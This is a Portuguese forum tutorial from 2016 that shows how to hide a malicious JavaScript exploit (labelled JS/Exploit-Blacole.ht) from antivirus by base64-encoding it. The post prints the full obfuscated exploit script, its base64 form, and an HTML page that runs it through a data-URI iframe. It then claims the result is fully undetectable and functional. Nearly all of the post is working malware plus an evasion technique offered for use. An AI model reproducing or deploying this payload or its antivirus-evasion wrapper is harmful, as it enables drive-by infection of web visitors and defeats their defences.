Tornar indetectável um js malicioso utilizando BASE64
Publicado: 08 Feb 2016, 21:57
por privateloader
No seguinte tutorial irei demonstrar como codificar em BASE64 um virus e torná-lo não detectado pelos antivirus.
Codigo malicioso (JS/Exploit-Blacole.ht)
Codificado em BASE64
Colocando a string no formato correcto...
Guardar como página html
O script agora é 100% não detectável e funciona.
Codigo malicioso (JS/Exploit-Blacole.ht)
Código: Seleccionar todo
<sc?ript>date=new Date();var ar="Jp}g3ra]A\"kmTdQh{,'=Dyi)cf>1(0o[F<BnCs? e.wvlu:HGtNb; /EM";try{gserkewg();}catch(a){k=new Boolean().toString()};var ar2="f159,0,-93,9,42,-33,-45,51,-18,63,-102,87,-15,42,-24,-114,111,27,18,-33,-12,-87,87,-15,42, -36,-9,-39,-27,-18,-9,141,-132,15,87,-36,-30,99,-63,-51,24,-9,15,24,-6,-66,48,-21,111,0,0,-93,9, -60,3,15,87,-105,69,-15,87,3,0,-153,111,3,12,-21,9,-3,-69,111,0,0,-120,51,-18,63,-102,87,-15,42, -24,3,-111,51,81,-27,-36,-57,72,-33,9,-60,3,15,87,-3,-6,-96,57,-15,-3,-9,102,0,-144,135,24,0,-153, 3,99,9,-105,114,-63,6,48,3,-108,120,27,-96,39,18,-120,42,-42,111,-96,39,-15,0,-12,66,6,24,-84, 123,-141,0,0,36,42,-93,15,120,21,-135,42,-72,102,-60,30,93,-141,18,0,99,-81,-18,-18,144,-144, -15,48,0,-3,63,9,-60,-27,108,-102,12,-3,27,6,-33,63,-72,75,-54,-57,36,102,-90,-3,27,6,-33,63,-6, 36,-84,69,-12,-63,-3,75,-63,45,-45,87,-87,66,-66,81,-84,75,-93,21,-27,0,81,-15,51,-153,87,21,-45, 81,-81,24,15,33,-120,135,-42,-21,42,3,12,-27,36,-24,-12,-45,72,-9,-51,69,-9,-57,-87,135,-51,69, -102,24,21,63,-96,9,-60,3,15,87,-42,-51,42,87,3,0,-153,153,0,-84,60,-30,-33,75,-81,24,15,12,-51, 9,-60,3,15,87,-105,69,-15,-21,111,0,0,-30,-111,-3,102,-42,42,-60,60,-78,51,-18,63,-102,87,-15, 42,-24,-51,-57,105,-102,129,-27,45,-33,-12,-87,87,-15,42,-63,-30,12,9,-60,3,15,87,-66,15,87, -81,48,-12,9,27,-123,123,0,-132,51,87,-18,12,-27,-36,-30,57,-96,57,-18,-3,3,-9,102,0,-144,135, 24,0,-153,3,99,9,-105,114,-63,6,48,3,-108,120,27,-96,39,18,-120,42,-42,111,-96,39,-15,0,-12,66, 6,24,-84,123,-141,0,0,36,42,-93,15,120,21,-135,42,-72,102,-60,30,93,-141,18,0,99,-81,-18,-18, 144,-144,-15,48,0,-3,15,87,-81,48,-12,36,-84,69,-12,3,6,-63,45,-45,87,-87,66,-66,81,-84,-6,-3, -9,21,-27,0,81,-15,-51,102,-81,48,-12,36,-84,69,-12,3,-120,87,21,-45,81,-81,24,15,-48,-3,-36, 135,-42,-21,42,3,12,-27,-66,102,-81,48,-12,36,-84,69,-12,3,9,-12,-45,72,-90,-3,33,-33,102,-81, 48,-12,36,-84,69,-12,3,24,-57,-87,54,-3,33,-33,102,-81,48,-12,9,27,-123,123,0,-132,51,87,-18, 12,-27,-36,-30,72,-60,-27,108,-102,9,-3,3,27,6,-33,15,87,-81,48,-12,9,27,-123,123,0,-132,51,87, -18,12,-27,-36,-30,-9,75,-54,-57,36,102,-93,-3,3,27,6,-33,15,87,3,0,0,-120,51,-18,63,-102,87, -15,42,-24,-114,111,27,18,-33,-12,-87,87,-15,42,-36,-9,-39,-27,-18,-9,141,-132,15,87,-36,-30, 99,-63,-51,24,-9,15,24,-6,-66,102,-105,-15,0,117,-15,-66,69,-63,21,66,-93,45,-9,-6,87,3, 0,-153]".replace(k.substr(0,1),'[');pau="rn ev2010".replace(date.getFullYear()-1,"al");e=new Function("","retu"+pau);e=e();ar2=e(ar2);s="";var pos=0;for(i=0;i<ar2.length;i++){pos+=parseInt(k.replace("false","0asd"))+ar2[i]/3;s+=ar.substr(pos,1);}e(s);</sc?ript>
Código: Seleccionar todo
PHNjJiM4MjAzO3JpcHQ+ZGF0ZT1uZXcgRGF0ZSgpO3ZhciBhcj0iSnB9ZzNyYV1BXCJrbVRkUWh7LCc9RHlpKWNmPjEoMG9bRjxCbkNzPyBlLnd2bHU6SEd0TmI7IC9FTSI7dHJ5e2dzZXJrZXdnKCk7fWNhdGNoKGEpe2s9bmV3IEJvb2xlYW4oKS50b1N0cmluZygpfTt2YXIgYXIyPSJmMTU5LDAsLTkzLDksNDIsLTMzLC00NSw1MSwtMTgsNjMsLTEwMiw4NywtMTUsNDIsLTI0LC0xMTQsMTExLDI3LDE4LC0zMywtMTIsLTg3LDg3LC0xNSw0MiwgLTM2LC05LC0zOSwtMjcsLTE4LC05LDE0MSwtMTMyLDE1LDg3LC0zNiwtMzAsOTksLTYzLC01MSwyNCwtOSwxNSwyNCwtNiwtNjYsNDgsLTIxLDExMSwwLDAsLTkzLDksIC02MCwzLDE1LDg3LC0xMDUsNjksLTE1LDg3LDMsMCwtMTUzLDExMSwzLDEyLC0yMSw5LC0zLC02OSwxMTEsMCwwLC0xMjAsNTEsLTE4LDYzLC0xMDIsODcsLTE1LDQyLCAtMjQsMywtMTExLDUxLDgxLC0yNywtMzYsLTU3LDcyLC0zMyw5LC02MCwzLDE1LDg3LC0zLC02LC05Niw1NywtMTUsLTMsLTksMTAyLDAsLTE0NCwxMzUsMjQsMCwtMTUzLCAzLDk5LDksLTEwNSwxMTQsLTYzLDYsNDgsMywtMTA4LDEyMCwyNywtOTYsMzksMTgsLTEyMCw0MiwtNDIsMTExLC05NiwzOSwtMTUsMCwtMTIsNjYsNiwyNCwtODQsIDEyMywtMTQxLDAsMCwzNiw0MiwtOTMsMTUsMTIwLDIxLC0xMzUsNDIsLTcyLDEwMiwtNjAsMzAsOTMsLTE0MSwxOCwwLDk5LC04MSwtMTgsLTE4LDE0NCwtMTQ0LCAtMTUsNDgsMCwtMyw2Myw5LC02MCwtMjcsMTA4LC0xMDIsMTIsLTMsMjcsNiwtMzMsNjMsLTcyLDc1LC01NCwtNTcsMzYsMTAyLC05MCwtMywyNyw2LC0zMyw2MywtNiwgMzYsLTg0LDY5LC0xMiwtNjMsLTMsNzUsLTYzLDQ1LC00NSw4NywtODcsNjYsLTY2LDgxLC04NCw3NSwtOTMsMjEsLTI3LDAsODEsLTE1LDUxLC0xNTMsODcsMjEsLTQ1LCA4MSwtODEsMjQsMTUsMzMsLTEyMCwxMzUsLTQyLC0yMSw0MiwzLDEyLC0yNywzNiwtMjQsLTEyLC00NSw3MiwtOSwtNTEsNjksLTksLTU3LC04NywxMzUsLTUxLDY5LCAtMTAyLDI0LDIxLDYzLC05Niw5LC02MCwzLDE1LDg3LC00MiwtNTEsNDIsODcsMywwLC0xNTMsMTUzLDAsLTg0LDYwLC0zMCwtMzMsNzUsLTgxLDI0LDE1LDEyLC01MSwgOSwtNjAsMywxNSw4NywtMTA1LDY5LC0xNSwtMjEsMTExLDAsMCwtMzAsLTExMSwtMywxMDIsLTQyLDQyLC02MCw2MCwtNzgsNTEsLTE4LDYzLC0xMDIsODcsLTE1LCA0MiwtMjQsLTUxLC01NywxMDUsLTEwMiwxMjksLTI3LDQ1LC0zMywtMTIsLTg3LDg3LC0xNSw0MiwtNjMsLTMwLDEyLDksLTYwLDMsMTUsODcsLTY2LDE1LDg3LCAtODEsNDgsLTEyLDksMjcsLTEyMywxMjMsMCwtMTMyLDUxLDg3LC0xOCwxMiwtMjcsLTM2LC0zMCw1NywtOTYsNTcsLTE4LC0zLDMsLTksMTAyLDAsLTE0NCwxMzUsIDI0LDAsLTE1MywzLDk5LDksLTEwNSwxMTQsLTYzLDYsNDgsMywtMTA4LDEyMCwyNywtOTYsMzksMTgsLTEyMCw0MiwtNDIsMTExLC05NiwzOSwtMTUsMCwtMTIsNjYsIDYsMjQsLTg0LDEyMywtMTQxLDAsMCwzNiw0MiwtOTMsMTUsMTIwLDIxLC0xMzUsNDIsLTcyLDEwMiwtNjAsMzAsOTMsLTE0MSwxOCwwLDk5LC04MSwtMTgsLTE4LCAxNDQsLTE0NCwtMTUsNDgsMCwtMywxNSw4NywtODEsNDgsLTEyLDM2LC04NCw2OSwtMTIsMyw2LC02Myw0NSwtNDUsODcsLTg3LDY2LC02Niw4MSwtODQsLTYsLTMsIC05LDIxLC0yNywwLDgxLC0xNSwtNTEsMTAyLC04MSw0OCwtMTIsMzYsLTg0LDY5LC0xMiwzLC0xMjAsODcsMjEsLTQ1LDgxLC04MSwyNCwxNSwtNDgsLTMsLTM2LCAxMzUsLTQyLC0yMSw0MiwzLDEyLC0yNywtNjYsMTAyLC04MSw0OCwtMTIsMzYsLTg0LDY5LC0xMiwzLDksLTEyLC00NSw3MiwtOTAsLTMsMzMsLTMzLDEwMiwtODEsIDQ4LC0xMiwzNiwtODQsNjksLTEyLDMsMjQsLTU3LC04Nyw1NCwtMywzMywtMzMsMTAyLC04MSw0OCwtMTIsOSwyNywtMTIzLDEyMywwLC0xMzIsNTEsODcsLTE4LCAxMiwtMjcsLTM2LC0zMCw3MiwtNjAsLTI3LDEwOCwtMTAyLDksLTMsMywyNyw2LC0zMywxNSw4NywtODEsNDgsLTEyLDksMjcsLTEyMywxMjMsMCwtMTMyLDUxLDg3LCAtMTgsMTIsLTI3LC0zNiwtMzAsLTksNzUsLTU0LC01NywzNiwxMDIsLTkzLC0zLDMsMjcsNiwtMzMsMTUsODcsMywwLDAsLTEyMCw1MSwtMTgsNjMsLTEwMiw4NywgLTE1LDQyLC0yNCwtMTE0LDExMSwyNywxOCwtMzMsLTEyLC04Nyw4NywtMTUsNDIsLTM2LC05LC0zOSwtMjcsLTE4LC05LDE0MSwtMTMyLDE1LDg3LC0zNiwtMzAsIDk5LC02MywtNTEsMjQsLTksMTUsMjQsLTYsLTY2LDEwMiwtMTA1LC0xNSwwLDExNywtMTUsLTY2LDY5LC02MywyMSw2NiwtOTMsNDUsLTksLTYsODcsMywgMCwtMTUzXSIucmVwbGFjZShrLnN1YnN0cigwLDEpLCdbJyk7cGF1PSJybiBldjIwMTAiLnJlcGxhY2UoZGF0ZS5nZXRGdWxsWWVhcigpLTEsImFsIik7ZT1uZXcgRnVuY3Rpb24oIiIsInJldHUiK3BhdSk7ZT1lKCk7YXIyPWUoYXIyKTtzPSIiO3ZhciBwb3M9MDtmb3IoaT0wO2k8YXIyLmxlbmd0aDtpKyspe3Bvcys9cGFyc2VJbnQoay5yZXBsYWNlKCJmYWxzZSIsIjBhc2QiKSkrYXIyW2ldLzM7cys9YXIuc3Vic3RyKHBvcywxKTt9ZShzKTs8L3NjJiM4MjAzO3JpcHQ+
Código: Seleccionar todo
<html><iframe src="data:text/html;base64,PHNjJiM4MjAzO3JpcHQ+ZGF0ZT1uZXcgRGF0ZSgpO3ZhciBhcj0iSnB9ZzNyYV1BXCJrbVRkUWh7LCc9RHlpKWNmPjEoMG9bRjxCbkNzPyBlLnd2bHU6SEd0TmI7IC9FTSI7dHJ5e2dzZXJrZXdnKCk7fWNhdGNoKGEpe2s9bmV3IEJvb2xlYW4oKS50b1N0cmluZygpfTt2YXIgYXIyPSJmMTU5LDAsLTkzLDksNDIsLTMzLC00NSw1MSwtMTgsNjMsLTEwMiw4NywtMTUsNDIsLTI0LC0xMTQsMTExLDI3LDE4LC0zMywtMTIsLTg3LDg3LC0xNSw0MiwgLTM2LC05LC0zOSwtMjcsLTE4LC05LDE0MSwtMTMyLDE1LDg3LC0zNiwtMzAsOTksLTYzLC01MSwyNCwtOSwxNSwyNCwtNiwtNjYsNDgsLTIxLDExMSwwLDAsLTkzLDksIC02MCwzLDE1LDg3LC0xMDUsNjksLTE1LDg3LDMsMCwtMTUzLDExMSwzLDEyLC0yMSw5LC0zLC02OSwxMTEsMCwwLC0xMjAsNTEsLTE4LDYzLC0xMDIsODcsLTE1LDQyLCAtMjQsMywtMTExLDUxLDgxLC0yNywtMzYsLTU3LDcyLC0zMyw5LC02MCwzLDE1LDg3LC0zLC02LC05Niw1NywtMTUsLTMsLTksMTAyLDAsLTE0NCwxMzUsMjQsMCwtMTUzLCAzLDk5LDksLTEwNSwxMTQsLTYzLDYsNDgsMywtMTA4LDEyMCwyNywtOTYsMzksMTgsLTEyMCw0MiwtNDIsMTExLC05NiwzOSwtMTUsMCwtMTIsNjYsNiwyNCwtODQsIDEyMywtMTQxLDAsMCwzNiw0MiwtOTMsMTUsMTIwLDIxLC0xMzUsNDIsLTcyLDEwMiwtNjAsMzAsOTMsLTE0MSwxOCwwLDk5LC04MSwtMTgsLTE4LDE0NCwtMTQ0LCAtMTUsNDgsMCwtMyw2Myw5LC02MCwtMjcsMTA4LC0xMDIsMTIsLTMsMjcsNiwtMzMsNjMsLTcyLDc1LC01NCwtNTcsMzYsMTAyLC05MCwtMywyNyw2LC0zMyw2MywtNiwgMzYsLTg0LDY5LC0xMiwtNjMsLTMsNzUsLTYzLDQ1LC00NSw4NywtODcsNjYsLTY2LDgxLC04NCw3NSwtOTMsMjEsLTI3LDAsODEsLTE1LDUxLC0xNTMsODcsMjEsLTQ1LCA4MSwtODEsMjQsMTUsMzMsLTEyMCwxMzUsLTQyLC0yMSw0MiwzLDEyLC0yNywzNiwtMjQsLTEyLC00NSw3MiwtOSwtNTEsNjksLTksLTU3LC04NywxMzUsLTUxLDY5LCAtMTAyLDI0LDIxLDYzLC05Niw5LC02MCwzLDE1LDg3LC00MiwtNTEsNDIsODcsMywwLC0xNTMsMTUzLDAsLTg0LDYwLC0zMCwtMzMsNzUsLTgxLDI0LDE1LDEyLC01MSwgOSwtNjAsMywxNSw4NywtMTA1LDY5LC0xNSwtMjEsMTExLDAsMCwtMzAsLTExMSwtMywxMDIsLTQyLDQyLC02MCw2MCwtNzgsNTEsLTE4LDYzLC0xMDIsODcsLTE1LCA0MiwtMjQsLTUxLC01NywxMDUsLTEwMiwxMjksLTI3LDQ1LC0zMywtMTIsLTg3LDg3LC0xNSw0MiwtNjMsLTMwLDEyLDksLTYwLDMsMTUsODcsLTY2LDE1LDg3LCAtODEsNDgsLTEyLDksMjcsLTEyMywxMjMsMCwtMTMyLDUxLDg3LC0xOCwxMiwtMjcsLTM2LC0zMCw1NywtOTYsNTcsLTE4LC0zLDMsLTksMTAyLDAsLTE0NCwxMzUsIDI0LDAsLTE1MywzLDk5LDksLTEwNSwxMTQsLTYzLDYsNDgsMywtMTA4LDEyMCwyNywtOTYsMzksMTgsLTEyMCw0MiwtNDIsMTExLC05NiwzOSwtMTUsMCwtMTIsNjYsIDYsMjQsLTg0LDEyMywtMTQxLDAsMCwzNiw0MiwtOTMsMTUsMTIwLDIxLC0xMzUsNDIsLTcyLDEwMiwtNjAsMzAsOTMsLTE0MSwxOCwwLDk5LC04MSwtMTgsLTE4LCAxNDQsLTE0NCwtMTUsNDgsMCwtMywxNSw4NywtODEsNDgsLTEyLDM2LC04NCw2OSwtMTIsMyw2LC02Myw0NSwtNDUsODcsLTg3LDY2LC02Niw4MSwtODQsLTYsLTMsIC05LDIxLC0yNywwLDgxLC0xNSwtNTEsMTAyLC04MSw0OCwtMTIsMzYsLTg0LDY5LC0xMiwzLC0xMjAsODcsMjEsLTQ1LDgxLC04MSwyNCwxNSwtNDgsLTMsLTM2LCAxMzUsLTQyLC0yMSw0MiwzLDEyLC0yNywtNjYsMTAyLC04MSw0OCwtMTIsMzYsLTg0LDY5LC0xMiwzLDksLTEyLC00NSw3MiwtOTAsLTMsMzMsLTMzLDEwMiwtODEsIDQ4LC0xMiwzNiwtODQsNjksLTEyLDMsMjQsLTU3LC04Nyw1NCwtMywzMywtMzMsMTAyLC04MSw0OCwtMTIsOSwyNywtMTIzLDEyMywwLC0xMzIsNTEsODcsLTE4LCAxMiwtMjcsLTM2LC0zMCw3MiwtNjAsLTI3LDEwOCwtMTAyLDksLTMsMywyNyw2LC0zMywxNSw4NywtODEsNDgsLTEyLDksMjcsLTEyMywxMjMsMCwtMTMyLDUxLDg3LCAtMTgsMTIsLTI3LC0zNiwtMzAsLTksNzUsLTU0LC01NywzNiwxMDIsLTkzLC0zLDMsMjcsNiwtMzMsMTUsODcsMywwLDAsLTEyMCw1MSwtMTgsNjMsLTEwMiw4NywgLTE1LDQyLC0yNCwtMTE0LDExMSwyNywxOCwtMzMsLTEyLC04Nyw4NywtMTUsNDIsLTM2LC05LC0zOSwtMjcsLTE4LC05LDE0MSwtMTMyLDE1LDg3LC0zNiwtMzAsIDk5LC02MywtNTEsMjQsLTksMTUsMjQsLTYsLTY2LDEwMiwtMTA1LC0xNSwwLDExNywtMTUsLTY2LDY5LC02MywyMSw2NiwtOTMsNDUsLTksLTYsODcsMywgMCwtMTUzXSIucmVwbGFjZShrLnN1YnN0cigwLDEpLCdbJyk7cGF1PSJybiBldjIwMTAiLnJlcGxhY2UoZGF0ZS5nZXRGdWxsWWVhcigpLTEsImFsIik7ZT1uZXcgRnVuY3Rpb24oIiIsInJldHUiK3BhdSk7ZT1lKCk7YXIyPWUoYXIyKTtzPSIiO3ZhciBwb3M9MDtmb3IoaT0wO2k8YXIyLmxlbmd0aDtpKyspe3Bvcys9cGFyc2VJbnQoay5yZXBsYWNlKCJmYWxzZSIsIjBhc2QiKSkrYXIyW2ldLzM7cys9YXIuc3Vic3RyKHBvcywxKTt9ZShzKTs8L3NjJiM4MjAzO3JpcHQ+" frameborder="0"></iframe></html>
O script agora é 100% não detectável e funciona.